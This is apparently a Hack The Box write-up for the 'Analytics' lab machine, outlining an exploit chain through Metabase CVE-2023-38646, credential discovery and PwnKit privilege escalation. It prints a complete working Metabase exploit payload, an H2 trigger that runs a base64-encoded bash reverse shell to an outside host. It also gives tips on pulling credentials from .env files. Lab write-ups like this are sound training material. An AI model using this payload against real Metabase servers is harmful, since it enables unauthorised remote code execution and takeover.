..
HTB - Analytics
Summary
The box hosts a service for big data analytics.
It uses a version of Metabase vulnerable to pre-auth RCE (CVE-2023-38646).
An unauthenticated user is ablet o access the setup-token for Metabase in through the source code of the page, and can use this to set up a reverse shell via /api/setup/validate.
From there, basic enumeration will get us an environment variable which stores the SSH password for the user.
For root, running linpeas suggests some exploits, and judging from the Ubuntu version, it is vulnerable to Pwnkit exploit (CVE-2021-4034).
Pwnkit exploit is a local privilege escalation exploit that is applicable to all major Linux distributions through the pkexec utility (kinda like sudo).
The json payload for Metabase
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details": {
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules": {},
"details": {
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjUvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "test",
"engine": "h2"
}
}
Some notes for silly mistakes I made
- When crafting a json payload in Burp, make sure to include the
Content-Type: application/jsonheader for it to be parsed. I wasted too much time figuring out why my payload wasn’t working… 🙃 - Check
.envfor credentials. - Encode payload in base64
- Look in
/usr/binfor binaries that we can use to upload stuff from our host.